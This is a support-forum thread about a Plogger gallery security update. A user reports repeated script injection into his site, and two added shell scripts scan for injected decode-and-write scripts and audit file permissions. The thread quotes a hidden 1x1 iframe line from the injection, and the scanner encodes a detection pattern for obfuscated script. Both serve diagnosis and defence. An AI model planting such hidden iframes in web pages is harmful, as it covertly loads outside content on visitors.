Plogger Support Forum - Important-- Security Update for 1.0b3 users (a.k.a. Version 3.0 Beta)
http://www.plogger.org/forum/
Thu, 28 Mar 2024 21:49:33 +0000

ryanduff, Mon, 18 Aug 2008 16:41:12 +0000
http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=8390#Comment_8390

publicly disclosed. We were notified after it was found and the problem has been corrected.

I ported changes back to version 1.0b3 for those not running current SVN. They can be found here. There are two changed files: plog-download.php and plog-remote.php (both found in the root folder). Replacing those files with those in the zip file will fix the issue.

For those running SVN, the changes were committed in r569 so as long as you've updated past that revision, you should be covered.

The download on the main page also has the updated files if you would like the whole package.

jwaddick, Thu, 11 Dec 2008 13:39:15 +0000
http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=9472#Comment_9472

Thanks
Janice

ryanduff, Thu, 11 Dec 2008 13:43:15 +0000
http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=9473#Comment_9473

fxfxfx, Fri, 19 Dec 2008 13:08:32 +0000
http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=9520#Comment_9520

What happens is that the following script is inserted in the index.php file:


There are small variations to the inserted scripts. Here's another version.

The script is always injected after the body iframe, before the div style.

<body><iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe>

HERE IS THE SCRIPT INJECTED

<div style="margin: auto; width: 750px;">
<?php the_gallery(); ?>


I have been communicating with the server company, but they only suggest what I have already done: chmodding to 755. I actually chmodded most files and directories to 544, including index.php, gallery.php, plog-config.php, plog-download.php, plog-remote.php, plog-load_config.php, plog-globals.php, plog-functions.php and plog-thumb.php, as well as whole directories including admin, lib and themes (all three recursively, chmod to 544).

Still, every hour or two, it's all hacked again and the script re-injected to index.php. The result is visible on the site, as content is dropped 100 or 200 pixels on the screen, as the script apparently takes this place. So it's clear when it happens (again).

How can I stop this?

...And when is the next version of Plogger coming? I'm scared that my site and the thousands of photos will be deleted by the hackers...

Frank
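
An added example, not part of the original post and not Plogger code: a scan of a web root for the pattern the post describes, an inline script that decodes a string with String.fromCharCode and emits it with document.write. The function name and the sample file names used to exercise it are assumptions of this example; a hit is a lead to triage, not proof of compromise.

```shell
#!/bin/sh
# Added example: list PHP/HTML files that contain an inline <script> element
# using BOTH String.fromCharCode and document.write (decode-and-write pattern).
# Output format: <path>:<line number where the <script> element starts>
scan_injected() {
    # $1 = web root to scan (read-only; nothing is modified)
    find "$1" -type f \( -name '*.php' -o -name '*.htm' -o -name '*.html' \) \
        -exec awk '
            FNR == 1                        { s = 0 }   # reset state per file
            /<script/                       { s = 1; fc = 0; dw = 0; start = FNR }
            s && /String\.fromCharCode/     { fc = 1 }
            s && /document\.write[ \t]*\(/  { dw = 1 }
            s && /<\/script>/ {
                # Report only when both markers occur in the same element.
                if (fc && dw) print FILENAME ":" start
                s = 0
            }
        ' {} +
}

# Stand-alone use: sh scan.sh /path/to/webroot
[ "$#" -eq 0 ] || scan_injected "$1"
```

Because the post reports re-injection every hour or two, running this from cron and alerting on any output shows when the change lands, which can then be matched against the access logs.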

sidtheduck, Fri, 19 Dec 2008 13:50:28 +0000
http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=9521#Comment_9521

Sorry to hear about your difficulties. Can you send a .zip file of your Plogger contents, an SQL dump, and any RAW access logs that you can get to security SPLAT plogger DOT org? We can take a look at it and try to figure out what is going on.

Also, have you checked the permissions of the Plogger folder itself to make sure the permissions are set at 0755? At this time, I don't know how Plogger would be the culprit to inserting this code between the body tag (after the inclusion of the gallery.php file) and the the_gallery() function. I'm thinking it may be some other intrusion to your system, but we can try to verify that it isn't for sure and to see if we can determine how they are getting in as well.

sidtheduck, Thu, 24 Sep 2009 11:34:34 +0000
http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=11429#Comment_11429

How do you know they got in through plog-upload.php and plog-import.php? Just curious as to how your site looks to be hacked (script injection, uploaded files, changed files, etc.). We need more information to help you figure out how they got in (through Plogger or some other means).

sidtheduck, Fri, 02 Oct 2009 19:47:21 +0000
http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=11450#Comment_11450

My recommended permissions are '0755' for directories and '0644' for files. There are certain server setups that will cause you to decrease permissions temporarily in the next release (during install or possibly some instances of changing .htaccess files for rewrite).

Currently with the beta3 version, there are some server setups that you have to decrease the permissions to '0776' (but most people tend to just decrease to '0777') on directories for Plogger or most other gallery software out there due to how the server is set up (safe_mode restrictions especially). While this is not ideal, a potential security hazard, and not the recommended solution, the other option would be to change web hosts (which a lot of people seem less willing to do) to someone who knows how to set up a secure server without crippling its abilities to run PHP as an environment set up for manipulating / creating directories and files.

So to answer your question, if you have your directories set to '0755', you should be fine as far as directory security goes.
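
An added example, not part of the thread and not Plogger code: a read-only audit of an install against the '0755' directory and '0644' file modes recommended above, with world-writable entries (the '0776'/'0777' case) listed separately. The function name and output labels are assumptions of this example.

```shell
#!/bin/sh
# Added example: report permission deviations under a gallery root.
#   WORLD-WRITABLE  any file or directory with the "other write" bit set
#                   (covers both 0776 and 0777)
#   DIR-NOT-0755    directory whose mode is not exactly 0755
#   FILE-NOT-0644   regular file whose mode is not exactly 0644
# A deviation is not always a hazard (0544 is stricter than 0644), but a
# directory without the execute bit for "other" may not be traversable by
# the web server, so it is worth seeing in the report.
audit_perms() {
    # $1 = install root; nothing is changed, only listed
    find "$1" \( -type d -o -type f \) -perm -0002 \
        -exec printf 'WORLD-WRITABLE %s\n' {} \;
    find "$1" -type d ! -perm -0002 ! -perm 0755 \
        -exec printf 'DIR-NOT-0755 %s\n' {} \;
    find "$1" -type f ! -perm -0002 ! -perm 0644 \
        -exec printf 'FILE-NOT-0644 %s\n' {} \;
}

# Stand-alone use: sh audit.sh /path/to/plogger
[ "$#" -eq 0 ] || audit_perms "$1"
```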